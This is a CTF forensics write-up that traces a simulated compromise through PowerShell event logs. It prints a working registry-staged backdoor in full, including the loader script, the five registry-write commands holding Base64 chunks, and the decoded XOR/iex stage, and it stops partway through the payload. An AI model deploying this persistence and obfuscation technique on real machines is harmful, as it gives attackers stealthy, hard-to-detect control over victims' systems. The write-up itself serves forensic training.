Forensics

Meowrine Corp

Challenge

A hacker recently got access to the computer of a high ranking admiral of the meowrine corp. We managed to kick him out and made sure nothing was stolen. However something weird has been going on over our network now. We suspect it is related to the recent hack so to help you, I’ve given you the logs during the hack and the network capture. Can you trace back the events that happened?

Solution

Traffic analysis reveals that a large amount of data was uploaded from 192.168.18.84 to 192.168.18.76. This could be information exfiltrated by the attacker.

Investigating the logs, critical information was found in Microsoft-Windows-PowerShell%4Operational.evtx.

A persistence backdoor was discovered in Event ID 20:

powershell

1$script = '$k=@("HKCU:\Environment","HKCU:\Console","HKCU:\Keyboard Layout","HKCU:\Control Panel\Desktop","HKCU:\Control Panel\Accessibility");$n=@("boot","update","load","install","exec");$s="";0..4|%{$s+=Get-ItemPropertyValue -Path $k[$_] -Name $n[$_]};iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))';2 3$p = "C:\Users\Whiskerstein\AppData\Local\Packages\MicrosoftTeams_8wekyb3d8bbwe\LocalCache\Microsoft\MSTeams\EBWebView\Default";4 5$f = Join-Path $p "restart.ps1";6 7if(-not(Test-Path $p)){New-Item -ItemType Directory -Path $p -Force|Out-Null};8 9Set-Content -Path $f -Value $script -Encoding UTF8

Creating the Backdoor Script File:
- $p = "C:\Users\Whiskerstein\...": Defines a seemingly normal path, hiding the malicious file within a legitimate application’s folder to evade detection.
- $f = Join-Path $p "restart.ps1": Defines the backdoor script’s filename as restart.ps1.
- if(-not(Test-Path...)){New-Item...}: Checks if the path exists, and creates it if it doesn’t.
- Set-Content -Path $f -Value $script...: Writes the string content from the $script variable into the C:\...\restart.ps1 file.
Backdoor Script Logic (the $script variable):
- $k=@("HKCU:\Environment", ...): Defines an array containing five registry paths.
- $n=@("boot","update","load","install","exec"): Defines an array containing five registry value names.
- $s="";0..4|%{$s+=Get-ItemPropertyValue ...}:
  - Reads the value of boot from HKCU:\Environment
  - Reads the value of update from HKCU:\Console
  - Reads the value of load from HKCU:\Keyboard Layout
  - Reads the value of install from HKCU:\Control Panel\Desktop
  - Reads the value of exec from HKCU:\Control Panel\Accessibility
  - Then, it concatenates these five retrieved values into a single long string, $s.
- iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))):
  - [Convert]::FromBase64String($s): Decodes the concatenated string $s from Base64.
  - [Text.Encoding]::UTF8.GetString(...): Converts the decoded bytes back into a UTF8 string.
  - iex: (Invoke-Expression) Executes this string.

Instead of writing the full malicious code directly into the .ps1 file, the attacker Base64-encoded the payload, split it into five parts, and hid each part in five different, seemingly harmless registry values.

Next, while examining the rest of the logs, traces of the attacker using PowerShell to write malicious content to the registry were found:

boot (from Event ID 14)

powershell

1New-ItemProperty -Path "HKCU:\Environment" -Name "boot" -Value "JHg9MTA5OyRjPSdTUjlOVUVvVkNBUVJSRVJLU2xrN09neFZBVDRtVkFFRUl4VWFQaVlVR2dRTUJnb1VOeGdCQUE1ZEl3TTBYQ01CSVFJL0xpWUJQelVJTGxRcU8xc0NPVFZkSnpVM1gxaGZEeWtaWEFnZEpEazlId0lxSjFvS0tna0RXRG8zSUZndURBWThKUThaQWlvbldpdzVQUncvTGlZVVZBQTNBaXdvSmdOWU9nd1VQMTQ0WFR0ZlB4Z0dPRDRwSXpzOFd3STVOUU5ZT2d3R1ZGODBHRHNHSVYwRk5UYzRXRDRQQVQ5ZURsZ2pYRHBhWFRVbUZWMHVERjBKQUE4QkZRWWhBajh1SVJvS0ZEY1lBUUFPWFNNRE5Gd2pBU0VDUHo0OUFqOFVDQjBzT1RjWVhBUWdBUW9xQ1FOWU9qY2dXQzRNQmdvRU54MFpCdzRHWFNrTUJoNDVDeDhlTGc0R0hqa21IVDgrSVFJL1hqY1lPeW81R0NBbEp4NG9LU1lZQVRvNVd3STVOUUkvTlRRakdUczlId1lxSjFwZFhqUUdYUmNtSFQ4VUloMGdLaWNlQmlvbkFnNEFEeDBuSlFrWEp6b0pPVmdVRGdaZEZ5WVVQeFFJSFN3cENRTmNGRFFHQ2dRM0hSazVKaDAvUGlFQ1AxNDNHRHNxT1JnZ0pTY2VQQ1VuQWxrNkRDTWRCeUlKQlNvSkJWeGRPbFFnS2lkYVhWd2dBU3dsSnc4QkZDQWVKQ2toRlFvdVBGUThKU2RhQVM0TVhRa0FEd0VWQmlFWFB5NEpIbHcrREFZS1BqY2VBU29NWGhrcElGUXNKU2RhTERrOUhUOFVJZ01PUGowVVB4UWlBd1lxSURzbk9TTUdDUWMwUEFrcElnYzNGejBYTkNraldnNDVJRjgzT1NBWE5DazNIdzRwTnhVT0J5TUdDVGtqSXpjNUl3UUpCejhCTnpraUx6Y3BJem9KT1NjQk53YzNCVFFYSUJjOEtTQllEaGMwT2pjcEl4OEpPUTRCTnpraldqUVhORG8zS1NOWU5CY2dXanNwSUFvbk9RZ0JOd2MzQ1RjNUlnVTNCenBkRGhjZ0h6YzVJQTQvQnlZVURnYzNIelFISUFFSk9TQVVEamtqWFQ4cE53RW5LVDBhSkRralhqY1hJQmczRnlRVURnYzNHalFISXhrL09UZ0dKeWtnSGljNU5BQUpGemdHTndjak9na1hJRDgzT1NaZEpDa2dGU2NwTnpzM0J6ZGNOQ2tqWHc0NUlnOC9LU1lHSnprakZ6Y0hJd0VPRnpVQU55azNYalE1SXlFM0J3a1VPQWMwRkE0NUlpOG5GemtGQ1NrM05UY0hJeUlKQndnWE5Da2pHQ1FwSUNrbkZ6cFpOQ2tqR3drNUlBRTBCeVlhT0NrM1hDY3BJd1lKRndrWERqa2pSalFwSXgwNEZ5TlpKQWNqRkRjNUlrWTNPU01FSXhjME9EY1hOQUkwS1RoY0RqazNJejhwTng0bkJ3OWREamtqR2c0SE55dy9Gd2dIQ1RrakJEUTVJd01KQnd3Qk56a2lHelFwSTE4T0J3a0JOd2MzWFRjWElEby9PVHhZRGhjME9qY3BJMW9KRnlNQk56a2pJRGNYTkNFM0Z6NVlOQmNnSERncElDUW5PVGNCTndjM0ZUYzVJZzQzQnpoZERoY2dMRGM1SUFjOE9UVVVEZ2MzWHpjSElDWUpLVG9VRGprak56OHBOd1luS1F3YUpDazNSZ2s1SWh3bk9UZGZORGtnTkRjNUl6dzNPU01IUHlrM0J5Y3BJQWNuRnpzRkNTazNRalFISTE0T0J3a1hOQ2tqT2ljcElCa2tGemxaTkNrakRnazVJQVEzRno0YU9DazNIaWNwSTFVSktRbFlOQmMwQmpjcElBQUpGenNYT0NraUppY3BOd2dqQnlNVUpEa2pHRGNwTng4M09Rc1ZORGszS2pjNUl4VTBPUTRITnpraVhUUUhJMTA4S1FzR0p5a2lWRHNISUQwbk9UNEVDU2tnSFQ4cElCc2tGejhYRGdjZ1dnNDVJeWMzQnlSZE5Ea2dSalE1SXpjM09UVlpQQ2szSlNjcElGa25LVDRVSkNrM096YzVJRmczQnlCY05BY2dCd2twSXhnT0J6Z1hEaWszR0NjcEkwWUpCelJjTkNrakFna1hJQXczRnowQU53YzNJU2M1TjE0MEJ5WUFOemtpS3pjcEl3VU9PU0FWTkJjZ05UYzVJaU0zT1RzSE55a2dCd2twSUJVT09Ud1ZOQWNnUHljcElDRW5PU0JjTkNrZ1d3azVJanNKQnc1ZE9Da2pHQTQ1TndBM0tUNWNOQ2tqS2drNU4xdzBPU2N" -PropertyType String -Force

update (from Event ID 10)

powershell

1New-ItemProperty -Path "HKCU:\Console" -Name "update" -Value "BTnhjZ0dEOHBOeWduRnpnYUpEazBGUWtwTjE4M09RdGZEaGNnSGpRcEl6VW5LU0lhSkRralhqY1hOQnMwQnpWWU5BY2pIejg1TjFrM0tUUllQQ2szWENRcElCZ25CeVJkRGhjZ0RBa0hOeFUwQnljYU9Da2dDQ2NwSTFzMEZ3NEFOeWtpQVRRcEl4Z0pLUWxjTkNrM0FUOHBOeGNrT1NBYUpBY2dDU2NwSTFRM0tTSVZOQWMzSnpjWE5CazBLU0lhRGpralBBa0hOMFlrRnc0YUlDa2lGU0FwSUFrak9TTlpJRGswWHlNSEl4b2pPU1JlSURrM1ZTY3BJaHdnT1NFVklEazNDQ2NwSWxzaktRbGZJRGtnSmlNNU53Y2tLVGdVSURraU9pTTVJQWtqQnowQUp3YzNIU1E1TkFJaktTY2FEaWtqV0E0cEl3UU9PVHBaTkFjZ0JpUXBJRmdrS1F4WU5BY2dYdzQ1SXhjNEZ3Z0dKeWtnSHljSElCd0pLVDFlRGpraUFqUUhORDhqRnpSY05Ea2pSZzQ1TndNM0Z6aFlOQ2tqUGdrNU56YzNLUXdBTnhjZ0t6ODVJam9KS1NZSE55a2pEQWs1TndRM0J5ZGNOQmMwWERRNUlsazNCemtYT0NrZ0J5YzVOeGcwS1E4QU56a2lCamNwSTFVSkJ3Z1hORGtnWEQ4SElCc0pPU0FBTndjZ1d3a0hJQ29KS1RSY1BDazNYaVFwSUY0a0tRNWNOQmNnR1RRSElBZ0pCd2tBTndjakNUOHBOeWduT1NRYUpEazBYalFITkFvM0J5TmRORGtnUGpjcEl3ODNGd2tYRGprM05UY0hJd1UzS1RSZEpDa2dIeWNwTnlJM0Z6VmNOQ2tqSVFrNUlsODhPU0lHSnpralh6UUhJeWtKT1QwQU55azNSamM1SXljM0Z6a1VPQWMwRnlBNUlrSWtGd2dYRGprakJUUXBJeThKS1RkWURnY2dPVDhwSXgwMEZ3NWNORGszUERjNUlqbzNGeUlVTkNrM0FEY0hOeXczQnpnWE5Da2pYaVFYTkNBbktUc0ZDU2szRHpjSEl3Y0pCeVFYTkNralZTY3BJZ1VuT1NBWERqa2pMemNwSXpvSk9UbFlEZ2NnRGo4WE5DQTNCemtITnprZ1d6dzVJeGszQnpWZERqa2lHRFFISUJrT0J5ZGVPRGswQWlNNU5Da2pGd2dHT3prakN6Y1hORjgwT1FoWU5BY2pGRHc1TndrbktUY0FQemtpWFQ4NU4xb2tPVDhHTnpralhEY3BJd1FPRno4WERqa2lBQTRYSUZ3N0tUUUVPd2MwV1NBNUlCUTNCelFHTnlrakNEY3BJd1VrT1FnRUp3Y2dGelFwSWxVM09TRmVORGtnSHpRSElGNDNCenRlTkRrZ0ZUUXBJeFFuT1RVRUp3YzNYemNISUFZSk9UdGNOQWMzR2pRNUlBd0pPU0FhRGlraldpUXBOMXNqS1RzWERqa2pYalFwSXlzSk9UeFlEZ2NnWFQ4cEl3bzNPVDVjTkRrM0FqUTVJaVEzT1NNVU5DazNIelFITngwME9UNFhOQ2tqR1NRSE5DY2pGeVpZSkNraUhTUTVJeDAwT1RRWERnYzNIemNwSUFjSkJ3NFhEamtpQmpRcEl3WThCendCSnhjZ0ZRazVJQmszRnc4Vk5EazNORGNISXdFMEJ5Y1ZOQ2szUmpRcEl6VTNCeVJkSkFjMEJDQTVJbHNrRno5Wk5Da2pBUWtYSXlRM09RZ0JOemtqWGpjWE5GUS9CeUlCSnhjZ0h3azVOMXcwQnljRU54YzBXRFE1SURjM0J3OEJOd2NqQXpjcEkxUTNCenBkSkJjMEFTUXBJRHNqRndrSEp4Y2dCZ2s1TnowM09UUUVOeGMwRGpjNUlDbzNGem9CTndjalZEY3BJeGcwS1NOZEpDa2lIU2NITkZrM0Z3a1hOQWMzSFRRWE5CVTNPVDhVUEJjMENUYzVJQ2MzRnprQk56a2lIVGNISXhvL0J6OEdOd2NnV3c0SE53QTNCeU5mTkJjZ1h3NDVOMTQzQnd3Vk5BY2dSZ2twSXhzNEZ6Y0JKd2NnSVFrSE56dzNPVHBkRGlrZ1ZBNDVJaHdPS1R3VURoY2dBalE1TndBMEJ3NWNOQ2tqQnljcE55UWpGeUFVTkNraUJEUVhJeDgwQnowVk5BY2dWRGNYSXhjMEJ3a1ZOQ2tqWGljSE5Ca2dLU1pZSkRrMEF6Y0hOQ2szQnpWZE5Ea2dBemNwSXdJM09Ud1hEamszQVRjSEkxczNGd2xkSkNraVhDY1hJQVFPRnlOY05Da2pIUWs1SWlNSk9RNFVQQmMwTHpjWE5EZzNLUThWUE" -PropertyType String -Force

load (from Event ID 16)

powershell

1New-ItemProperty -Path "HKCU:\Keyboard Layout" -Name "load" -Value "NralZEUTVJQUkwT1F0Y05BY2dCRHM1TkE0akJ6c0ZJeWszQURnNUkxODNGenNITnpraU5UY0hJd2cvS1NZQkp3YzNDajg1SWhrOEJ5UUJKeWszQlRRNUl4MDNLVHRkRGhjZ09BazVJZ0lKS1FzWE9BYzBBRGdwTnhzakZ6c1hEamszWHpjSE5CYzNLVDBITnprZ0FUUTVOMXMwQnpSZk5Da2pLRGNwSXdBbkZ6NEVJemtpT3ljcElsc2tPVDBVRGdjM1JqUXBJMVVKQnc4YURqa2lId2tISUNnSkJ3c1hORGszWGpRNUl5dy9PVHhjTkNrakhnazVJQmMwRnpwY05BY2dPZ2tYSUVZL0Z5UUJKeGNnV1E0NUlCazNCeWNWTkRrM0tqY0hJd1EzS1RjVk5DazNJemNwSTFvMEtUVmRKQ2szSGlNSElCNEpPVDBBTnlrak9Ba3BJQm9KQnpsWURnY2dCQWtYSUZvME9RZ0JOemtqRkRRcEl4b25GemdFSXprZ09UY3BOeWczQndsZE5Da2pRaVFwTnl3akZ6UmZPRGtpVlQ4NU53b25GeU1YRGprZ0dEUTVJQTQzS1E0Qk53Y2pYalE1SUZzMEZ6b0dOeWtqSERRcEkxMG5GejhFSXdjM0d6UUhJRndKS1QxY05BYzNJemM1SUFBSktUb2FEaWtqWFNRcE53QWpGd3hZRGprakhUUUhORHcvQnc0Qkp4Y2dCZ2s1SURrM0J5SVZORGszRHpjSEkxazNPUWtWTkNrM1ZEY3BJejAzT1NaZEpBYzBPU001SWtZa0tRaFpKRGtqRnpRcEl3SU9CemdWTkRrakJUUUhJQThKS1NNWFBEazBXaUE1TkFNak9Ud0dPeGNnT0FrNUkxVTNGd2tWUERrM1JpUTVJaXNKRnpSWk5Da2dYUWs1SUFJM0Z6VVVEaGNqQWpjSE56UTNPVGxkRGlrZ0pnazVJZ1FPT1RRVURoY2dIVDg1Tnh3bkJ3aFlEaWtqR3drNUloazBGd3dVRGprald3NFhJRGMzQnlCY05CY2dGVGc1Tnlrbk9UUUdOemtqQlRRcEl3VUpGeUFYRGpraUtRa1hJQ003S1NjRU95azNPQ01YSUFVSktUb1ZORGtnQlRRNU54ZzNPVHRmTkRrZ0NqY3BOeGMzS1R4ZE5Da2pCQ2NITkFVZ0J6aFlKQ2tpQkNRNUl3azNGejhYRGdjM0JqUXBJQmNPT1NJWERqa2lDVGNwSXpjL0tTTUJKeWszQ3pjcEl3WTNCejFmTkJjZ0dna0hJeW8zQnpnRkNTa2pIU2NITkFJZ09UUllKRGtnQnpjcE54ZzBGdzlkTkNralJpUXBJaGtuRnlJWERqa2pBVGNwSXlnSktTZFlEZ2NnRkQ4cEkxc0pPVDFjTkJjaldUODVOMW9rQnlZR055a2pXVFFISXdVMEtROFhEZ2NqSGpRNU5Ca0pPU0pkSkFjME9pTTVJaGduRnpnQU53Y2dGUTQ1SXg0M0J3a0FOemtnV2drcElEb0pLUWxkSkNraUlTY1hJQ0VKRnlOY05Da2pEZ2s1SWc0SkJ5SVVQQ2tqQUE0NUl4ZzBCejllUERrM1h5UXBOeFUzT1RsZE5BY2pEemNYSUJ3T0Z3aGZORGswV0FrcEl4c25Cd2tFSXpraUlDY3BJa0lrS1RWY05Da2pSZ2s1SURvM0tUMWNOQWNnR1FrWElBYzhGdzRGSXprMEZ5TXBOelE3Rno4VURqa2pXalFwSXdVM0J3bFlOQWNqQUFrSE54MDNLVDBVRGlrZ1ZEZzVJMXMwQnc0WE5Ea2lWRFFISXhvT09TWVVEamtqSHpRWElGNDdPVG9BTnlrakhBNHBJQVVKS1Q5WURnY2dKd2tYSUJnOE9TQmVQRGszUGo4SElBVTdPVG9CSnpraUtna3BJajgzRnprYURqa2dWVFFISUJnT0J5TmVOQWMzQURjcEl5Z0pGemNhRGpraUhnNEhJQlFKT1FzWFBEazNHU1E1SWxVSk9UdGREamtpRERjSElCa09GejljRGhjZ0pEYzVJejQzQndzWE9EazNHQ1FwTngwM0Z3eGNOQ2tqQkE0WElGa0pCd2hZRGhjZ0l6c0hORlU0S1RrR0l5azNHelFwSTFrM0tRNWZOQmNnVlFrSEl5NDNPU0lGQ1NraldDY0hOQ3dqS1NkZklEa2dPeU1wSUFrbkJ6UUdPd2MwWFRnNUl3NDNLVFJkRGpraVJnNEhJRGczS1R3YUpDa2pWUTRYSUN3M0J5SmNORGswWERRSElCVTNLVDhBUHlrM0FDY1hJeThKQnpsY05EazNIVDhwTnlRak9UZ1ZOQ2szRlRjcEl6czNGd2xkSkFj" -PropertyType String -Force

install (from Event ID 12)

powershell

1New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "install" -Value "MFZTQUhJd1FnT1RVVklDa2dOU2NwTnlJN0Z3NEVPemtqRGpjcEkxd0pPVDVZRGdjZ1hqY3BJRGNuRnp0ZERoY2dKRGM1STFrM0tRZ0ZOd2NnVlRRSE54NDhLUXdHSnhjakJ3azVJd1UzRnpRQlB5azNJeU1ITndVMEJ6Z1VEamtqRERjSE53QTBLVDRWRGlrZ0t3a3BJeGNrS1FzRUNUa2lXQ2M1TkJnM0Z3NEVOeWtqS2pjNUlBczNGemRkTkJjZ0NnazVOd2MwQnlSZk5Da2pLaWNwSUJvbkZ5TlpOQ2tqWGc0NUlDODNPU01hT0NrM0JDY3BJeUlKQnprWERqa2pBVFFwSXg4NEJ5SlpKQWNqQVRjNUlqMDNCeVlFSXpralhUUTVJeGdKS1RnQk56a2lJRGNwSXhvSkZ5RUJOd2MzV2pRWElBYy9GejlZRGhjMEpEY3BJelVKT1NFQk56a2pKRGNYTkFJM09TQllOQmNnTnpzcElBUWtGeU1CTndjM1dqUTVJa0kwRnc5ZERoY2dGelE1SUJ3OE9TUVVEZ2MzT3pjSElGUU9PU1lVRGpraktUOHBOMVFrT1RRYUpDa2pEd2tYSUQ0SkZ5WmNOQ2tqSWdrWElDWUpPU0lWTkFjalBEOHBJQThuS1RRSE56a2pIalFISTFVT09TZGNOQmMwUHo4NU4xZzNGelFBTnpraU9UY1hJQjBPS1Q0WERqa2pJVGNISURzSkJ6MGFEaWszWFRjSE53TTNCeVFYUENrM1hpUXBJQWduRnpvRk53YzBMamNwSXdrM09Rc1ZOQ2tqSlRjWElEc0pGeVFCTndjalhEUXBJMVFuT1R3YUpDa2lBemNwSXhrSkJ6OFZOQ2tnT2pzNU4xbzNGemdBTnpraVBqY3BJeVFKQndzVk5EazNXelE1SWpRM0J6UmREaGNnS0FrNUl6czNPUTVkUENrM0FTY3BJQVFuRnpwY05BY2pPQWs1SWpvM0Z6OVpOQmNnRHpjSElGNE9CejhWUENrM0JpUVhJRlVKQndrWERqa2pBRFFISUZzSkJ3NGFEaWszQ2pjSE54VTNLU01YUEJjMFhRNHBOd0VPT1NBVUpDa2dGQWtwTnhnM0J3bGREamszSENjNU5EMG5GemNVSkNrZ1dDUTVJem8zS1Q0RU56a2lWVGNYTkFBM0Z5WmREZ2MzUFRjNU53RTNPU1lHSnlrZ1BDYzVJMXMwQnpvR056a2dGRGM1TndjL0J6a0JKd2MzRlRzcEl5Y25LVGthSkNralBUYzVOeGMzQnowVk5DazNKU2NwSUZza0tRa1VKRGswV3ljcEl3c0pGd3dhRGpraU5EY0hJQVVPS1NZWE5CY2dCQTQ1TnlrM0Z5TVZOQWNnV2c0cEl6MEpCd3dGSndjZ0JTUXBJQmtuT1R4Y05BYzBIamM1SWw4ME9TRUhOeWtqQndrSE53STNPVGtCTnlrM0xDY3BJQXNuQnlOY05DazNDemM1SUJjM0Z5SUJQemszQnlRSE4xUTRPU0ZkSkNrZ0dpUXBJeGczQnowQk56a2dXVGNwTnlZbktUVWFKQWNnSndrNUl3STNCdzRCTnpraVdqYzVJQUkzRnpoZERqazNWVFFITjE0MEtTSVhQQmNnWHdrNUlpNC9GdzhYT0NrZ0NUczVOeUluT1FnQU95a2pHU2NwSUY0bktUeGREZ2MzQWpRNU54czNPUXNHSndjMEhBa3BJem9KS1E4WE5Ea2pYamM1TkFJMEtUc1VOQWMzTno4cE4xa25PUTljTkFjZ0h3azVJd2czS1FsWk5CY2pHRGdYTkIwT0J5ZGNOQmMwR2pjNUloNDBPVFZmUENrM1dTY3BJQVFuRno1Y05CY2dId2tISUZzSkZ5UmNEaGNnT2pjNUl5azNCeUFVT0NrM09DY3BJQlVrS1RVVUpCY2dGQTRwSXljSkJ6Y0JOemtqUWpRcE54bzBLVDFjRGhjZ0FqUUhOeGcwQnc1ZFBCYzBCVHM1SXc0L0J6VUhQemtpWGp3SEl4US9CdzhBUHdjZ0lEc3BJQlU0T1NFVU9Ea2pQajhYSUFZNE9UVmNPRGswV0NNSEl3a0pCdzRCTnprakxEY3BJMW9rT1RrVUpDa2dCeVFwTnl3M0Z3aGNOQ2tqVlE0NUlpTS9PVHRkTkJjMEFEUTVJalEzT1NCWk5CY2dMejhwTjFnbkJ3aGREamtqUERjWEkxNDhPVFFFQ1RraVdnNEhJQlFKQnp0ZERnYzBPaU1ISUFrbk9TY1hORGszRnpRNUl5STNPU0VCSnlraUtEY0hOQ1kzS1Q0Rk53Y2pCVGNYSUE4Sk9UaGRORGtnSHpjNUlCbzNLVGRkSkJjME" -PropertyType String -Force

exec (from Event ID 18)

powershell

1New-ItemProperty -Path "HKCU:\Control Panel\Accessibility" -Name "exec" -Value "5Uc3BJRUk0T1FzR1B6a2pJRDhwSXlnN09Ra0ZJd2NqV0FrNU54MDBLVDljTkNrakJpY0hJQVlrT1NjR0l6azBEQWtwTnhjMEZ3aGZEaGNnSURjcEl3OG5GejhFSXdjZ0Z5Y3BJRFVKT1QxWU5EazBMQWs1Tnhva0tUcFpOQWMwTGpjNU5GMDNCeVJmTkJjZ1hRa3BJd3MzQndrVk5Ea2dXVGNwSXdVbkJ6Z0hPeWtnSERncE53NC9GeUpjUENrakRqczVOQThqQnd0ZkRqazNGVGM1STBZMEZ6ZGRKQWNnV2lRcE4xb2dCejBGTndjMFd6Y3BJeDAwQno4Vk5Da2pKVGNYSUFJSkJ5RUJOd2NqR2pRcEkxc2tPVGNFSXpraUl5Y3BOeUlKRnlJR096a2lXeVFwSWtZMEZ5UmREaGNqTERjNU54VTNLUXhjTkJjMEl6ODVOd2NrS1NBVVBEa2dDejg1SWtZM0tReFlORGtpUEQ4NUlqUS9LU0JZUEFjZ0lqOEhJQm84T1FzVVBBY2dDajhISUZvOEtTRVZQRGtnQXo4NUlEVS9LUXdWUERrZ1ZUODVJQUUvT1Q0VlBEa2dHVHc1SUJ3OEJ6b1ZQRGtnT1Q4NUlGczhCemdWUERrZ0lEOHBJeGduT1NRYUpDazNQVGM1SXhVT0tUb0dOemtpSVRjcEloVUpPVGtWTkNrM0dEd3BOd1FuT1NjYUpDazNPamNITnp3M0Z6cGRORGszS1RjNUlBRTBCem9VT0NrM09pY3BJMTRKS1RwY05CY2pCandwSWgwbkJ6VUVPd2NnQ3o4NUlDay9GemxZTkRraU9EYzVJancvQnpoWVBEa2lKajhISUFNL09UOFVQQWNnS3o4SElDUS9GelFVUERrZ05EODVJQmsvT1NjVlBEa2dXanc1SUZRL0J5RVZQRGtnSGp3NUlBYzhLU0FWUERrZ1dqdzVJQmc4S1FrVlBEa2dCejg1SUFnL09UdGRKQWMwWHdrcElsNDBCelVYTkRrZ0tqYzVJelUvS1RVVURnYzNIVGNISXgwL0tUa0hDVGtpSmljNUl3a2pPU1lWSURrM0NTYzVOeDhuS1Q4VklDa2lEaWNwSWpjbktTQUJOemtpWHpjSE54czBCemNGTnlrM0xpY3BOdzRqT1E5Wk5BYzBIamM1TkZVME9UMWZOQmNnQXdrcEkxUTBCelFWTkRrZ0tqY3BJd1VrQnlRRUl4Y2pCQ1E1TnhjT09Ua0dDUWMwSHc0cE55dzdCeU1FT3lrM0hpQXBOMThrS1QwRUp3YzNJRHM1SWc0bkZ3eFpKQWNqV0NjNU54azRGemRjSkNrakZTUVhJQ1FuS1Q0YVBEa2dHeVE1TkFjT0J3OVlEaWtpRkE0WEkxb09CeUZmRGprakJRa3BJd29KRnlBWERnY2dDd2s1SUFFSkZ5QWFEZ2MzSFRRNU54YzNGendHTnhjMEFEY0hORG8zQnc0Rk56a2lCelFwSWxrM09UVmVOQWNqRGpjNUkwWTBGenhkTkJjZ05UY0hJQlEwT1NjVk5EazBJRHM1SWdjN0J6OVpPQmNqTkRzSEl6ODdCenRjT0NraldUZ1hJRVk0QnowVU9Ea2dKRHNwSUFVNEtUMEFQemszWGp3cE54OC9GdzhIUHdjME9UODVOQVk4T1NkWVBDa2lLVDhYSXlRL0tRdGZQRGtqQWo4cEkxcy9GemdYUEFjZ0pEODVJRFEvT1FsWUlDa2lCU01YSTFrakZ3bGZJRGtqUHlNcEkxNGdGdzRYSUFjZ0ZTQTVJQm9qT1NNYUlCY2pCaVFwTnlJakJ5UVVQRGtnSHo4NUlrWTBPVGhZTkRraUhqdzVJamcvQndsWVBBY2dLajhISUJjOEZ6NFVQQWNnUHo4SElCbzhCejRWUERrZ0JEODVJQWsvS1RRVlBEa2dKVDg1SUFFOEtRd1ZQRGtnRkQ4NUlBQS9CeVlWUERrZ0xqODVJRjQ4T1RvVlBEa2dWRDhwSTE0bkZ5ZFVJQ1VuU2twRkNnTUVIeGsrV1ZzSUhnd3ZBQUlmSzFkWE1Ca2ZDQnNEQWk1REFBZ1pIaFErTmtVS0F3UWZHVDRaQ0NwRFZTczVPRmRYTUFvREJBa0NEZ01vUXhrVkNEbERBQWdaSGhRK05rcFdTUjgyUUZ4RFEwQkZTUjlESVFnRENoa0ZSREJOUUFjQ0JBTk5Ta3BORVUwRUNCVT0nOyR4ZD1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjKTskcmQ9Jyc7Zm9yZWFjaCgkYiBpbiAkeGQpeyRyZCs9W2NoYXJdKCRiIC1ieG9yICR4KX07aWV4ICRyZA==" -PropertyType String -Force

Concatenating the values in the order boot -> update -> load -> install -> exec and then Base64-decoding the result yields:

powershell

1$x=109;$c='SR9NUEoVCAQRRERKSlk7OgxVAT4mVAEEIxUaPiYUGgQMBgoUNxgBAA5dIwM0XCMBIQI/LiYBPzUILlQqO1sCOTVdJzU3X1hfDykZXAgdJDk9HwIqJ1oKKgkDWDo3IFguDAY8JQ8ZAionWiw5PRw/LiYUVAA3AiwoJgNYOgwUP144XTtfPxgGOD4pIzs8WwI5NQNYOgwGVF80GDsGIV0FNTc4WD4PAT9eDlgjXDpaXTUmFV0uDF0JAA8BFQYhAj8uIRoKFDcYAQAOXSMDNFwjASECPz49Aj8UCB0sOTcYXAQgAQoqCQNYOjcgWC4MBgoENx0ZBw4GXSkMBh45Cx8eLg4GHjkmHT8+IQI/XjcYOyo5GCAlJx4oKSYYATo5WwI5NQI/NTQjGTs9HwYqJ1pdXjQGXRcmHT8UIh0gKiceBionAg4ADx0nJQkXJzoJOVgUDgZdFyYUPxQIHSwpCQNcFDQGCgQ3HRk5Jh0/PiECP143GDsqORggJScePCUnAlk6DCMdByIJBSoJBVxdOlQgKidaXVwgASwlJw8BFCAeJCkhFQouPFQ8JSdaAS4MXQkADwEVBiEXPy4JHlw+DAYKPjceASoMXhkpIFQsJSdaLDk9HT8UIgMOPj0UPxQiAwYqIDsnOSMGCQc0PAkpIgc3Fz0XNCkjWg45IF83OSAXNCk3Hw4pNxUOByMGCTkjIzc5IwQJBz8BNzkiLzcpIzoJOScBNwc3BTQXIBc8KSBYDhc0OjcpIx8JOQ4BNzkjWjQXNDo3KSNYNBcgWjspIAonOQgBNwc3CTc5IgU3BzpdDhcgHzc5IA4/ByYUDgc3HzQHIAEJOSAUDjkjXT8pNwEnKT0aJDkjXjcXIBg3FyQUDgc3GjQHIxk/OTgGJykgHic5NAAJFzgGNwcjOgkXID83OSZdJCkgFScpNzs3BzdcNCkjXw45Ig8/KSYGJzkjFzcHIwEOFzUANyk3XjQ5IyE3BwkUOAc0FA45Ii8nFzkFCSk3NTcHIyIJBwgXNCkjGCQpICknFzpZNCkjGwk5IAE0ByYaOCk3XCcpIwYJFwkXDjkjRjQpIx04FyNZJAcjFDc5IkY3OSMEIxc0ODcXNAI0KThcDjk3Iz8pNx4nBw9dDjkjGg4HNyw/FwgHCTkjBDQ5IwMJBwwBNzkiGzQpI18OBwkBNwc3XTcXIDo/OTxYDhc0OjcpI1oJFyMBNzkjIDcXNCE3Fz5YNBcgHDgpICQnOTcBNwc3FTc5Ig43BzhdDhcgLDc5IAc8OTUUDgc3XzcHICYJKToUDjkjNz8pNwYnKQwaJCk3Rgk5IhwnOTdfNDkgNDc5Izw3OSMHPyk3BycpIAcnFzsFCSk3QjQHI14OBwkXNCkjOicpIBkkFzlZNCkjDgk5IAQ3Fz4aOCk3HicpI1UJKQlYNBc0BjcpIAAJFzsXOCkiJicpNwgjByMUJDkjGDcpNx83OQsVNDk3Kjc5IxU0OQ4HNzkiXTQHI108KQsGJykiVDsHID0nOT4ECSkgHT8pIBskFz8XDgcgWg45Iyc3ByRdNDkgRjQ5Izc3OTVZPCk3JScpIFknKT4UJCk3Ozc5IFg3ByBcNAcgBwkpIxgOBzgXDik3GCcpI0YJBzRcNCkjAgkXIAw3Fz0ANwc3ISc5N140ByYANzkiKzcpIwUOOSAVNBcgNTc5IiM3OTsHNykgBwkpIBUOOTwVNAcgPycpICEnOSBcNCkgWwk5IjsJBw5dOCkjGA45NwA3KT5cNCkjKgk5N1w0OScANxcgGD8pNygnFzgaJDk0FQkpN183OQtfDhcgHjQpIzUnKSIaJDkjXjcXNBs0BzVYNAcjHz85N1k3KTRYPCk3XCQpIBgnByRdDhcgDAkHNxU0BycaOCkgCCcpI1s0Fw4ANykiATQpIxgJKQlcNCk3AT8pNxckOSAaJAcgCScpI1Q3KSIVNAc3JzcXNBk0KSIaD